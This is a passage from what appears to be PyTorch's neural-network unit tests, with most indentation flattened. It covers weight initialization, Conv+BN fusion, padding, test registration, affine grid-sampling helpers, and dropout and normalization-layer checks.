gain = self._random_float(0.1, 2)
init.orthogonal_(input_tensor, gain=gain)
else:
init.orthogonal_(input_tensor)
rows, cols = tensor_size[0], reduce(mul, tensor_size[1:])
flattened_tensor = input_tensor.view(rows, cols)
if rows > cols:
self.assertEqual(torch.mm(flattened_tensor.t(), flattened_tensor),
torch.eye(cols) * gain ** 2, atol=1e-6, rtol=0)
else:
self.assertEqual(torch.mm(flattened_tensor, flattened_tensor.t()),
torch.eye(rows) * gain ** 2, atol=1e-6, rtol=0)
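    # A minimal, self-contained sketch of the property asserted above
    # (illustrative helper, not called by the tests): for a wide matrix
    # (rows <= cols), init.orthogonal_ makes the rows orthogonal up to the
    # gain, so W @ W.T is approximately gain**2 * I.
    @staticmethod
    def _orthogonal_property_sketch():
        w = torch.zeros(3, 5)
        init.orthogonal_(w, gain=2.0)
        return torch.mm(w, w.t())  # approximately 4 * torch.eye(3)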
def test_deprecation(self):
x = torch.randn(3, 3)
def fn():
init.normal(x)
with self.assertWarnsRegex(UserWarning, 'deprecated', msg='methods not suffixed with underscore should be deprecated'):
fn()
class TestFusionEval(TestCase):
@given(X=hu.tensor(shapes=((5, 3, 5, 5),)),
running_mean=hu.tensor(shapes=(6,)),
running_var=hu.tensor(shapes=(6,)))
def test_fuse_module_eval_numerics(self, X, running_mean, running_var):
inputs, _ = X
iC, oC = inputs.shape[1], len(running_mean[0])
inputs = torch.from_numpy(inputs).to(torch.double)
kernel_size = (3, 3)
conv_ref = torch.nn.Conv2d(iC, oC, bias=True, kernel_size=kernel_size)
bn_ref = torch.nn.BatchNorm2d(oC)
bn_ref.running_mean = torch.from_numpy(running_mean[0]).to(torch.double)
bn_ref.running_var = torch.from_numpy(running_var[0]).to(torch.double)
conv_ref.eval()
bn_ref.eval()
Y_ref = bn_ref(conv_ref(inputs))
conv_bn_fused = torch.nn.utils.fusion.fuse_conv_bn_eval(conv_ref,
bn_ref)
Y_hat = conv_bn_fused(inputs)
self.assertEqual(Y_ref, Y_hat, msg="Conv+BN fusion results are off")
na_bn_ref = torch.nn.BatchNorm2d(oC, affine=False)
na_bn_ref.running_mean = torch.from_numpy(running_mean[0]).to(torch.double)
na_bn_ref.running_var = torch.from_numpy(running_var[0]).to(torch.double)
na_bn_ref.eval()
Y_ref = na_bn_ref(conv_ref(inputs))
conv_na_bn_fused = torch.nn.utils.fusion.fuse_conv_bn_eval(conv_ref,
na_bn_ref)
Y_hat = conv_na_bn_fused(inputs)
self.assertEqual(Y_ref, Y_hat, msg="Conv+BN(non-affine) fusion results are off")
class TestConstantPadNd(TestCase):
def test_constant_pad_nd(self):
a = torch.tensor([[1, 2], [3, 4]])
res = torch.constant_pad_nd(a, [1, 2, 1, 0], 9)
expected = torch.tensor([
[9, 9, 9, 9, 9],
[9, 1, 2, 9, 9],
[9, 3, 4, 9, 9]
])
self.assertEqual(res, expected)
def test_preserves_memory_format(self):
nchw_tensor = torch.rand((1, 2, 5, 3))
nchw_padded = torch.constant_pad_nd(nchw_tensor, [1, 2], 0.5)
self.assertTrue(nchw_padded.is_contiguous(memory_format=torch.contiguous_format))
nhwc_tensor = nchw_tensor.contiguous(memory_format=torch.channels_last)
nhwc_padded = torch.constant_pad_nd(nhwc_tensor, [1, 2], 0.5)
self.assertTrue(nhwc_padded.is_contiguous(memory_format=torch.channels_last))
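    # Note on the pad-spec convention exercised above (inferred from the
    # expected tensor in test_constant_pad_nd): the pad list is consumed in
    # pairs from the last dimension inward, so [1, 2, 1, 0] pads columns by
    # (left=1, right=2) and rows by (top=1, bottom=0).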
class TestAddRelu(TestCase):
def test_add_relu(self):
a = torch.rand((7, 11))
b = torch.rand((7, 11))
a = a.float()
b = b.float()
a = a * -10
a = a + 5
add_res = a + b
relu_res = torch.relu(add_res)
add_relu_res = torch._VF._add_relu(a, b)
self.assertEqual(add_relu_res, relu_res)
def test_add_relu_broadcasting(self):
a = torch.rand((1, 32))
b = 1
b_scalar = torch.ones(1, 32)
res = torch._VF._add_relu(a, b)
broadcasted_res = torch._VF._add_relu(a, b_scalar)
self.assertEqual(broadcasted_res, res)
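# A minimal reference sketch of what torch._VF._add_relu fuses (the
# illustrative equivalent used by the assertions above, not the actual fused
# kernel):
def _add_relu_reference_sketch(a, b):
    return torch.relu(a + b)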
def add_test(test, decorator=None):
def add(test_name, fn):
if hasattr(TestNN, test_name):
raise RuntimeError('Found two tests with the same name: ' + test_name)
if decorator is not None:
fn = decorator(fn)
setattr(TestNN, test_name, fn)
test_name = test.get_name()
if not hasattr(test, 'test_cpu') or test.test_cpu:
add(test_name, lambda self, test=test: test(self))
cuda_test_name = test_name + '_cuda'
    # With dtype enabled, it is sufficient to test against three floating-point types
kwargs = {}
if 'extra_args' in get_function_arglist(test.test_cuda):
kwargs['extra_args'] = test.extra_args
if 'dtype' in get_function_arglist(test.test_cuda):
if tf32_is_not_fp32() and test.with_tf32:
def with_tf32_off(self, test=test, kwargs=kwargs):
with tf32_off():
test.test_cuda(self, dtype=torch.float, **kwargs)
add(cuda_test_name + '_fp32', with_tf32_off)
def with_tf32_on(self, test=test, kwargs=kwargs):
with tf32_on(self, test.tf32_precision):
test.test_cuda(self, dtype=torch.float, **kwargs)
add(cuda_test_name + '_tf32', with_tf32_on)
else:
add(cuda_test_name + '_float', lambda self,
test=test, kwargs=kwargs: test.test_cuda(self, dtype=torch.float, **kwargs))
add(cuda_test_name + '_double', lambda self,
test=test, kwargs=kwargs: test.test_cuda(self, dtype=torch.double, **kwargs))
def test_half(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.half, **kwargs)
if getattr(test, 'check_half', True):
add(cuda_test_name + '_half', test_half)
def test_bfloat16(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.bfloat16, **kwargs)
if getattr(test, 'check_bfloat16', True):
add(cuda_test_name + '_bfloat16', test_bfloat16)
def test_cfloat(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.cfloat, **kwargs)
def test_cdouble(self, test=test, kwargs=kwargs):
test.test_cuda(self, dtype=torch.cdouble, **kwargs)
if getattr(test, 'check_complex', False):
add(cuda_test_name + '_cfloat', test_cfloat)
add(cuda_test_name + '_cdouble', test_cdouble)
else:
def with_tf32_off(self, test=test, kwargs=kwargs):
with tf32_off():
test.test_cuda(self, **kwargs)
if tf32_is_not_fp32() and test.with_tf32:
add(cuda_test_name + '_fp32', with_tf32_off)
def with_tf32_on(self, test=test, kwargs=kwargs):
with tf32_on(self, test.tf32_precision):
test.test_cuda(self, **kwargs)
add(cuda_test_name + '_tf32', with_tf32_on)
else:
add(cuda_test_name, with_tf32_off)
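# For example (illustrative): a test whose get_name() returns 'test_Linear' is
# registered on TestNN as test_Linear and, for CUDA, as either
# test_Linear_cuda_fp32 / test_Linear_cuda_tf32 (when TF32 differs from FP32
# and the test opts in) or test_Linear_cuda_float / _double / _half variants.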
for test_params in module_tests + new_module_tests:
# TODO: CUDA is not implemented yet
if 'constructor' not in test_params:
name = test_params.pop('module_name')
test_params['constructor'] = getattr(nn, name)
decorator = test_params.pop('decorator', None)
test = NewModuleTest(**test_params)
add_test(test, decorator)
if 'check_eval' in test_params:
# create a new test that is identical but that sets module.training to False
desc = test_params.get('desc', None)
test_params['desc'] = 'eval' if desc is None else desc + '_eval'
def gen_eval_constructor(constructor):
def eval_constructor(*args, **kwargs):
cons = constructor(*args, **kwargs)
cons.training = False
return cons
eval_constructor.__name__ = constructor.__name__
return eval_constructor
test_params['constructor'] = gen_eval_constructor(test_params['constructor'])
test = NewModuleTest(**test_params)
add_test(test, decorator)
if 'check_with_long_tensor' in test_params:
fullname = test_params.get('fullname', None)
if fullname:
test_params['fullname'] = fullname + '_with_long_tensor'
else:
desc = test_params.get('desc', None)
test_params['desc'] = 'with_long_tensor' if desc is None else desc + '_with_long_tensor'
def double_equivalent_of_long_tensor(size):
return torch.randint(-1000, 1000, size=size).double()
def apply_to_cons(t):
if t.is_floating_point():
if isinstance(t, Parameter):
return Parameter(double_equivalent_of_long_tensor(t.size()))
elif isinstance(t, torch.Tensor):
return double_equivalent_of_long_tensor(t.size())
else:
return t
def gen_long_tensor_constructor(constructor):
def long_tensor_constructor(*args, **kwargs):
cons = constructor(*args, **kwargs)
cons._apply(apply_to_cons)
return cons
long_tensor_constructor.__name__ = constructor.__name__
return long_tensor_constructor
def gen_long_tensor_input(input_size):
def input_func():
return double_equivalent_of_long_tensor(input_size)
return input_func
def reference_fn(i, p, m):
            # For bad reasons this would create LongTensors that require gradients.
            # Remove requires_grad to avoid this.
for p in m.parameters():
p.requires_grad_(False)
m._apply(lambda t: t.long())
input = i.long()
out = m.forward(input)
return out
test_params['constructor'] = gen_long_tensor_constructor(test_params['constructor'])
test_params['input_fn'] = gen_long_tensor_input(test_params['input_size'])
test_params['reference_fn'] = reference_fn
test_params['check_forward_only'] = True
# Currently we don't support conv2d/conv3d for LongTensor in CUDA
test_params['test_cuda'] = False
test = NewModuleTest(**test_params)
add_test(test, decorator)
for test_params in criterion_tests:
if 'constructor' not in test_params:
name = test_params.pop('module_name')
test_params['constructor'] = getattr(nn, name)
test = CriterionTest(**test_params)
decorator = test_params.pop('decorator', None)
add_test(test, decorator)
if 'check_sum_reduction' in test_params:
desc = test_params.get('desc', None)
test_params['desc'] = 'sum_reduction' if desc is None else desc + '_sum_reduction'
def gen_sum_reduction_constructor(constructor):
def sum_reduction_constructor(*args, **kwargs):
cons = constructor(*args, reduction='sum', **kwargs)
return cons
sum_reduction_constructor.__name__ = constructor.__name__
return sum_reduction_constructor
test_params['constructor'] = gen_sum_reduction_constructor(test_params['constructor'])
test = CriterionTest(**test_params)
add_test(test, decorator)
class UnpoolingNet(nn.Module):
def __init__(self, pool, unpool):
super(UnpoolingNet, self).__init__()
self.pool = pool
self.unpool = unpool
def forward(self, input):
return self.unpool(*self.pool(input))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool1d(2, return_indices=True),
nn.MaxUnpool1d(2)),
input_size=(1, 1, 4),
fullname='MaxUnpool1d_net',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool2d(2, return_indices=True),
nn.MaxUnpool2d(2)),
input_size=(1, 1, 2, 4),
fullname='MaxUnpool2d_net',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool3d(2, return_indices=True),
nn.MaxUnpool3d(2)),
input_size=(1, 1, 2, 4, 6),
fullname='MaxUnpool3d_net',
check_gradgrad=False,))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool1d(2, return_indices=True),
nn.MaxUnpool1d(2)),
input_size=(1, 4),
reference_fn=single_batch_reference_fn,
fullname='MaxUnpool1d_net_no_batch_dim',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool2d(2, return_indices=True),
nn.MaxUnpool2d(2)),
input_size=(1, 2, 4),
reference_fn=single_batch_reference_fn,
fullname='MaxUnpool2d_net_no_batch_dim',))
add_test(NewModuleTest(
constructor=lambda: UnpoolingNet(
nn.MaxPool3d(2, return_indices=True),
nn.MaxUnpool3d(2)),
input_size=(1, 2, 4, 6),
reference_fn=single_batch_reference_fn,
fullname='MaxUnpool3d_net_no_batch_dim',
check_gradgrad=False))
class _AdaptiveLogSoftmaxWithLoss(nn.AdaptiveLogSoftmaxWithLoss):
def __call__(self, input):
t = torch.tensor([0, 1, 4, 8]).to(input.device)
return nn.AdaptiveLogSoftmaxWithLoss.__call__(self, input, t).output
add_test(NewModuleTest(
constructor=lambda: _AdaptiveLogSoftmaxWithLoss(16, 10, [2, 6]),
input_size=(4, 16),
fullname='AdaptiveLogSoftmax',
with_tf32=True,
tf32_precision=0.005))
# The following are helpers for TestNN.test_affine_*
if torch.cuda.is_available():
def device_():
return ['cpu', 'cuda']
else:
def device_():
return ['cpu']
def angle_rad_():
return [r * math.pi * 2 for r in [0.0, 0.5, 0.25, 0.125, random.random()]]
def axis_vector_():
t = (random.random(), random.random(), random.random())
l = sum(x ** 2 for x in t) ** 0.5
return [(1.0, 0.0, 0.0), (0.0, 1.0, 0.0), (0.0, 0.0, 1.0), tuple(x / l for x in t)]
def input_size2d_():
return [[1, 1, 3, 5], [1, 1, 3, 3], [1, 1, 4, 4], [1, 1, 3, 4]]
def output_size2d_():
return [[1, 1, 5, 3], [1, 1, 3, 5], [1, 1, 4, 3], [1, 1, 5, 5], [1, 1, 6, 6]]
def input_size2dsq_():
return [[1, 1, 2, 2], [1, 1, 3, 3], [1, 1, 4, 4], [1, 1, 6, 6]]
def output_size2dsq_():
return [[1, 1, 2, 2], [1, 1, 3, 3], [1, 1, 4, 4], [1, 1, 5, 5], [1, 1, 6, 6]]
def input_size3d_():
return [[1, 1, 2, 2, 2], [1, 1, 2, 3, 4], [1, 1, 3, 3, 3], [1, 1, 4, 4, 4], [1, 1, 3, 4, 5]]
def input_size3dsq_():
return [[1, 1, 2, 2, 2], [1, 1, 3, 3, 3], [1, 1, 4, 4, 4], [1, 1, 6, 6, 6]]
def output_size3dsq_():
return [[1, 1, 2, 2, 2], [1, 1, 3, 3, 3], [1, 1, 4, 4, 4], [1, 1, 5, 5, 5], [1, 1, 6, 6, 6]]
def output_size3d_():
return [[1, 1, 2, 2, 2], [1, 1, 3, 3, 3], [1, 1, 3, 4, 5], [1, 1, 4, 3, 2], [1, 1, 5, 5, 5], [1, 1, 6, 6, 6]]
def _buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad):
input_center = [(x - 1) / 2.0 for x in input_size]
output_center = [(x - 1) / 2.0 for x in output_size]
s = math.sin(angle_rad)
c = math.cos(angle_rad)
intrans_ary = np.array([
[1, 0, input_center[2]],
[0, 1, input_center[3]],
[0, 0, 1],
], dtype=np.float64)
inscale_ary = np.array([
[input_center[2], 0, 0],
[0, input_center[3], 0],
[0, 0, 1],
], dtype=np.float64)
rotation_ary = np.array([
[c, -s, 0],
[s, c, 0],
[0, 0, 1],
], dtype=np.float64)
outscale_ary = np.array([
[1.0 / output_center[2], 0, 0],
[0, 1.0 / output_center[3], 0],
[0, 0, 1],
], dtype=np.float64)
outtrans_ary = np.array([
[1, 0, -output_center[2]],
[0, 1, -output_center[3]],
[0, 0, 1],
], dtype=np.float64)
reorder_ary = np.array([
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
], dtype=np.float64)
transform_ary = np.dot(np.dot(np.dot(np.dot(
intrans_ary,
inscale_ary),
rotation_ary.T),
outscale_ary),
outtrans_ary)
grid_ary = np.dot(np.dot(np.dot(reorder_ary, rotation_ary.T), outscale_ary), outtrans_ary)
    transform_tensor = torch.from_numpy(rotation_ary).to(device, torch.float32)
transform_tensor = transform_tensor[:2].unsqueeze(0)
return transform_tensor, transform_ary, grid_ary
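# Reading the composition above (stated as an assumption about intent,
# inferred from the matrix names): normalized grid coordinates are scaled and
# translated into output pixel space (outscale/outtrans), rotated, then mapped
# back into input pixel space (inscale/intrans); reorder_ary swaps (row, col)
# into the (x, y) ordering that affine_grid expects.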
def _buildEquivalentAffineTransforms3d(device, input_size, output_size, angle_rad, axis_vector):
input_center = [(x - 1) / 2.0 for x in input_size]
output_center = [(x - 1) / 2.0 for x in output_size]
s = math.sin(angle_rad)
c = math.cos(angle_rad)
c1 = 1 - c
intrans_ary = np.array([
[1, 0, 0, input_center[2]],
[0, 1, 0, input_center[3]],
[0, 0, 1, input_center[4]],
[0, 0, 0, 1],
], dtype=np.float64)
inscale_ary = np.array([
[input_center[2], 0, 0, 0],
[0, input_center[3], 0, 0],
[0, 0, input_center[4], 0],
[0, 0, 0, 1],
], dtype=np.float64)
l, m, n = axis_vector
scipyRotation_ary = np.array([
[l * l * c1 + c, m * l * c1 - n * s, n * l * c1 + m * s, 0],
[l * m * c1 + n * s, m * m * c1 + c, n * m * c1 - l * s, 0],
[l * n * c1 - m * s, m * n * c1 + l * s, n * n * c1 + c, 0],
[0, 0, 0, 1],
], dtype=np.float64)
z, y, x = axis_vector
torchRotation_ary = np.array([
[x * x * c1 + c, y * x * c1 - z * s, z * x * c1 + y * s, 0],
[x * y * c1 + z * s, y * y * c1 + c, z * y * c1 - x * s, 0],
[x * z * c1 - y * s, y * z * c1 + x * s, z * z * c1 + c, 0],
[0, 0, 0, 1],
], dtype=np.float64)
outscale_ary = np.array([
[1.0 / output_center[2], 0, 0, 0],
[0, 1.0 / output_center[3], 0, 0],
[0, 0, 1.0 / output_center[4], 0],
[0, 0, 0, 1],
], dtype=np.float64)
outtrans_ary = np.array([
[1, 0, 0, -output_center[2]],
[0, 1, 0, -output_center[3]],
[0, 0, 1, -output_center[4]],
[0, 0, 0, 1],
], dtype=np.float64)
reorder_ary = np.array([
[0, 0, 1, 0],
[0, 1, 0, 0],
[1, 0, 0, 0],
[0, 0, 0, 1],
], dtype=np.float64)
transform_ary = np.dot(np.dot(np.dot(np.dot(
intrans_ary,
inscale_ary),
np.linalg.inv(scipyRotation_ary)),
outscale_ary),
outtrans_ary)
grid_ary = np.dot(np.dot(np.dot(reorder_ary, np.linalg.inv(scipyRotation_ary)), outscale_ary), outtrans_ary)
transform_tensor = torch.from_numpy((torchRotation_ary)).to(device, torch.float32)
transform_tensor = transform_tensor[:3].unsqueeze(0)
return transform_tensor, transform_ary, grid_ary
# end TestNN.test_affine_* helpers
class TestNNDeviceType(NNTestCase):
def _test_dropout(self, cls, device, input, memory_format=torch.contiguous_format):
p = 0.2
input = input.to(device).fill_(1 - p)
module = cls(p)
input_var = input.clone(memory_format=memory_format).requires_grad_()
output = module(input_var)
self.assertTrue(output.is_contiguous(memory_format=memory_format))
self.assertLess(abs(output.data.mean() - (1 - p)), 0.05)
output.backward(input)
self.assertTrue(input_var.grad.is_contiguous(memory_format=memory_format))
self.assertLess(abs(input_var.grad.data.mean() - (1 - p)), 0.05)
module = cls(p, True)
input_var = input.clone(memory_format=memory_format).requires_grad_()
output = module(input_var + 0)
self.assertTrue(output.is_contiguous(memory_format=memory_format))
self.assertLess(abs(output.data.mean() - (1 - p)), 0.05)
output.backward(input)
self.assertTrue(input_var.grad.is_contiguous(memory_format=memory_format))
self.assertLess(abs(input_var.grad.data.mean() - (1 - p)), 0.05)
# check eval mode doesn't change anything
for inplace in [True, False]:
module = cls(p, inplace).eval()
self.assertEqual(input, module(input))
# Check that these don't raise errors
module.__repr__()
str(module)
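    # A minimal reference sketch of the train-time scaling _test_dropout
    # checks above (illustrative, not the actual kernel): surviving elements
    # are rescaled by 1 / (1 - p) so the output mean matches the input mean in
    # expectation.
    @staticmethod
    def _dropout_reference_sketch(x, p):
        mask = (torch.rand_like(x) >= p).to(x.dtype)
        return x * mask / (1.0 - p)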
def _test_dropout_discontiguous(self, cls, device, memory_format=torch.contiguous_format):
# In this test, we verify that dropout preserves the layout and data for different memory formats.
        # We check whether we get the same values for the output of dropout when the
        # probability of dropout is 0 or very close to 0.
# Reference: https://github.com/pytorch/pytorch/issues/47176
close_to_zero_p = 1e-10 # Should be almost zero but not zero, as for p=0 different path is taken
for p in [0, close_to_zero_p]:
inp = torch.ones(2, 3, 3, 3, device=device)
inp_discontiguous = torch.empty(2, 3, 3, 6, device=device, memory_format=memory_format)[..., ::2]
inp_discontiguous.copy_(inp)
mod = cls(p=p)
out = mod(inp_discontiguous)
if p != 0: # Zero will keep strides as is based on input.
# When prob == 0, input stride (54, 18, 6, 2) -> output stride (54, 18, 6, 2)
# When prob != 0, input stride (54, 18, 6, 2) -> output stride (27, 9, 3, 1)
self.assertTrue(out.is_contiguous(memory_format=memory_format))
self.assertEqual(inp_discontiguous, out)
def _test_dropout_stride_mean_preserve(self, cls, device):
def invert_perm(p):
d = {x: i for i, x in enumerate(p)}
return (d[0], d[1], d[2], d[3])
inp = torch.ones(2, 3, 4, 5, device=device)
shifts = [(0, 0), (1, 0), (0, 1), (1, 1)]
for perm in itertools.permutations((0, 1, 2, 3), r=4):
for shift in shifts:
for p in [1e-10, 0.3, 0.5, 0.7]:
mod = cls(p=p)
permuted_inp = inp.permute(perm).contiguous().permute(invert_perm(perm))
permuted_inp = permuted_inp[shift[0]:, shift[1]:, :, :]
out = mod(permuted_inp)
self.assertTrue(out.permute(perm).is_contiguous())
self.assertEqual(inp.mean(), out.mean(), rtol=0.5, atol=0.5)
if p == 1e-10:
self.assertEqual(permuted_inp, out)
else:
self.assertNotEqual(permuted_inp, out)
def _test_InstanceNorm_general(self, cls, input, device, dtype=torch.float):
# default case track_running_stats=False
b, c = input.size(0), input.size(1)
input_var = input.to(device=device, dtype=dtype).requires_grad_()
IN = cls(c, eps=0).to(device, dtype)
output = IN(input_var)
out_reshaped = output.view(b * c, -1)
mean = out_reshaped.mean(1)
var = out_reshaped.var(1, unbiased=False)
self.assertEqual(torch.abs(mean.data).mean(), 0, atol=1e-5, rtol=0)
self.assertEqual(torch.abs(var.data).mean(), 1, atol=1e-5, rtol=0)
# check that eval mode doesn't change behavior
grad_out = torch.randn_like(output)
res1 = output.data.clone()
output.backward(grad_out)
grad1 = input_var.grad.data.clone()
IN.eval()
output = IN(input_var)
input_var.grad = None
output.backward(grad_out)
res2 = output.data
grad2 = input_var.grad.data
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
        # If track_running_stats=True and momentum=1, running_mean/var should be
        # equal to mean/var of the input (with unbiased correction)
IN = cls(c, momentum=1, eps=0, track_running_stats=True).to(device, dtype)
output = IN(input_var)
input_reshaped = input_var.transpose(1, 0).reshape(c, -1)
mean = input_reshaped.mean(1)
input_reshaped = input_var.transpose(1, 0).reshape(c, b, -1)
var = input_reshaped.var(2, unbiased=True)[:, :]
self.assertEqual(torch.abs(mean.data - IN.running_mean).mean(), 0, atol=1e-5, rtol=0)
self.assertEqual(torch.abs(var.data.mean(1) - IN.running_var).mean(), 0, atol=1e-5, rtol=0)
# in eval mode, adding X * std to a channel in input should make the
# corresponding channel in output have mean X
IN.eval()
delta = IN.running_var.sqrt() * torch.arange(c, device=device, dtype=dtype)
delta = delta.view(-1, *[1 for _ in range(2, input.dim())])
output = IN(input_var + delta)
self.assertEqual(output.transpose(0, 1).reshape(c, -1).mean(1), torch.arange(c, dtype=dtype))
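    # A minimal reference sketch of the per-(n, c) statistics InstanceNorm is
    # checked against above (illustrative, affine=False path only):
    @staticmethod
    def _instance_norm_reference_sketch(x, eps=1e-5):
        dims = tuple(range(2, x.dim()))
        mean = x.mean(dim=dims, keepdim=True)
        var = x.var(dim=dims, unbiased=False, keepdim=True)
        return (x - mean) / torch.sqrt(var + eps)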
def _test_InstanceNorm_cuda_half(self, cls, input, device):
# THNN
input = input.to(device=device, dtype=torch.half).random_(1, 10).requires_grad_(True)
m = cls(input.size(1), affine=True, track_running_stats=True).to(device, torch.half)
thnn_output = m(input)
thnn_output.sum().backward()
thnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(thnn_output, input)
# cuDNN
if TEST_CUDNN:
input.grad = None
m = m.float()
cudnn_output = m(input)
cudnn_output.sum().backward()
cudnn_input_grad = input.grad.data.clone()
self.assertEqualTypeString(cudnn_output, input)
self.assertEqual(cudnn_output, thnn_output, atol=1e-4, rtol=0)
self.assertEqual(cudnn_input_grad, thnn_input_grad, atol=1e-3, rtol=0)
def _test_LayerNorm_general(self, device, dtype=torch.float):
for i in range(2, 6):
shape = torch.randint(3, 6, (i,), dtype=torch.long).tolist()
x = torch.empty(*shape, device=device, dtype=dtype).uniform_(0, 10)
normalized_ndim = random.randint(1, i - 1) # inclusive
normalized_shape = shape[-normalized_ndim:]
unnormalized_shape = shape[:-normalized_ndim]
# test that LN normalizes to mean 0 and stddev 1
ln = nn.LayerNorm(normalized_shape, eps=0).to(device, dtype)
ln.weight.data.fill_(1)
ln.bias.data.fill_(0)
output = ln(x)
out_reshaped = output.view(*(unnormalized_shape + [-1]))
mean = out_reshaped.mean(-1)
var = out_reshaped.var(-1, unbiased=False)
delta = 1e-1 if dtype == torch.bfloat16 else 1e-5
self.assertEqual(torch.abs(mean.data).mean(), 0, atol=delta, rtol=0)
self.assertEqual(torch.abs(var.data).mean(), 1, atol=delta, rtol=0)
# test that LN applies weight and bias correctly
scale, bias = torch.empty(2).uniform_(0.2, 2).tolist()
ln.weight.data.fill_(scale)
ln.bias.data.fill_(bias)
output = ln(x)
out_reshaped = output.view(*(unnormalized_shape + [-1]))
mean = out_reshaped.mean(-1)
var = out_reshaped.var(-1, unbiased=False)
self.assertEqual(torch.abs(mean.data).mean(), bias, atol=delta, rtol=0)
self.assertEqual(torch.abs(var.data).mean(), scale ** 2, atol=delta, rtol=0)
bad_norm_shape_input_shape = {
(): (),
(2, 3): (3,),
(2,): (1, 2, 3),
(10,): (2, 3),
10: (2, 3),
}
for norm_shape, input_shape in bad_norm_shape_input_shape.items():
ln = nn.LayerNorm(norm_shape)
input = torch.empty(input_shape, device=device, dtype=dtype).uniform_(0, 10)
self.assertRaises(RuntimeError, lambda: ln(input))
def _test_LayerNorm_cuda_half(self, device):
input = torch.empty(2, 3, 3, 2, device=device, dtype=torch.half).random_(1, 10).requires_grad_(True)
m = nn.LayerNorm([3, 2]).to(device, torch.half)
output = m(input)
output.sum().backward()
self.assertEqualTypeString(output, input)
def _test_GroupNorm_general(self, device, dtype=torch.float):
good_shape_g = {
(1, 2, 3, 4): 2,
(2, 3, 10): 3,
(3, 1, 1, 1, 2): 1,
(2, 6, 4, 2, 2): 3,
(1, 256, 1, 1): 32,
}
for shape_g, grad in product(good_shape_g.items(), [True, False]):
shape, g = shape_g
x = torch.empty(*shape, device=device, dtype=dtype).uniform_(0, 10)
x.requires_grad_(grad)
b = shape[0]
c = shape[1]
# test that GN normalizes to mean 0 and stddev 1
gn = nn.GroupNorm(g, c, eps=0).to(device, dtype)
gn.weight.data.fill_(1)
gn.bias.data.fill_(0)
output = gn(x)
out_reshaped = output.view(b, g, -1)
mean = out_reshaped.mean(-1)
var = out_reshaped.var(-1, unbiased=False)
# TODO: fix numerical issue. See #44863
self.assertEqual(torch.abs(mean).mean(), 0, atol=1e-3, rtol=1e-3)
self.assertEqual(torch.abs(var).mean(), 1, atol=1e-3, rtol=1e-3)
output.backward(torch.randn_like(output))
if output.is_cuda:
torch.cuda.synchronize()
# test that GN applies weight and bias correctly
scale = torch.empty(c, device=device, dtype=dtype).uniform_(0.2, 2)
bias = torch.empty(c, device=device, dtype=dtype).uniform_(0.2, 2)
gn.weight.data.copy_(scale)
gn.bias.data.copy_(bias)
output = gn(x)
out_reshaped = output.view(b, c, -1)
out_normed = (out_reshaped - bias.view(c, 1)) / scale.view(c, 1)
out_normed_reshaped = out_normed.view(b, g, -1)
mean = out_normed_reshaped.mean(-1)
var = out_normed_reshaped.var(-1, unbiased=False)
# TODO: fix numerical issue. See #44863
self.assertEqual(torch.abs(mean).mean(), 0, atol=1e-3, rtol=1e-3)
self.assertEqual(torch.abs(var).mean(), 1, atol=1e-3, rtol=1e-3)
bad_shape_g = {
(1, 2, 3, 4): 3,
(2, 3, 10): 2,
(3, 1, 1, 1, 2): 10,
(2, 6, 4, 2, 2): 4,
}
for shape, g in bad_shape_g.items():
gn = nn.GroupNorm(g, shape[1])
input = torch.empty(*shape, device=device, dtype=dtype).uniform_(0, 10)
self.assertRaises(RuntimeError, lambda: gn(input))
def _test_GroupNorm_cuda_half(self):
input = torch.zeros(2, 4, 3, 2, requires_grad=True).cuda().half().random_(1, 10)
m = nn.GroupNorm(2, 4).to("cuda", torch.half)
output = m(input)
output.sum().backward()
self.assertEqualTypeString(output, input)
def _test_module_empty_input(self, module, inp, check_size=True):
inp.requires_grad_(True)
out = module(inp)
gO = torch.rand_like(out)
out.backward(gO)
if check_size:
self.assertEqual(out.size(), inp.size())
for p in module.parameters():
if p.requires_grad:
self.assertEqual(p.grad, torch.zeros_like(p.grad))
self.assertEqual(inp.grad, torch.zeros_like(inp))
def _test_module_empty_inputs(self, module, inputs):
for _inp in inputs:
_inp.requires_grad_(True)
out = module(*inputs)
gO = torch.rand_like(out)
out.backward(gO)
for p in module.parameters():
if p.requires_grad:
self.assertEqual(p.grad, torch.zeros_like(p.grad))
for _inp in inputs:
self.assertEqual(_inp.grad, torch.zeros_like(_inp))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off()
def test_affine_2d_rotate0(self, device):
        # scipy before 1.0.0 does not support homogeneous coordinates in
        # scipy.ndimage.affine_transform, so we need to skip.
input_size = [1, 1, 3, 3]
input_ary = np.array(np.random.random(input_size), dtype=np.float32)
output_size = [1, 1, 5, 5]
angle_rad = 0.
transform_tensor, transform_ary, offset = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
offset=offset,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
self.assertEqual(scipy_ary.mean(), gridsample_ary.mean())
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.001)
def test_affine_2d_rotate90(self, device):
        # scipy before 1.0.0 does not support homogeneous coordinates in
        # scipy.ndimage.affine_transform, so we need to skip.
for input_size2dsq, output_size2dsq in \
itertools.product(input_size2dsq_(), output_size2dsq_()):
input_size = input_size2dsq
input_ary = np.array(np.random.random(input_size), dtype=np.float32)
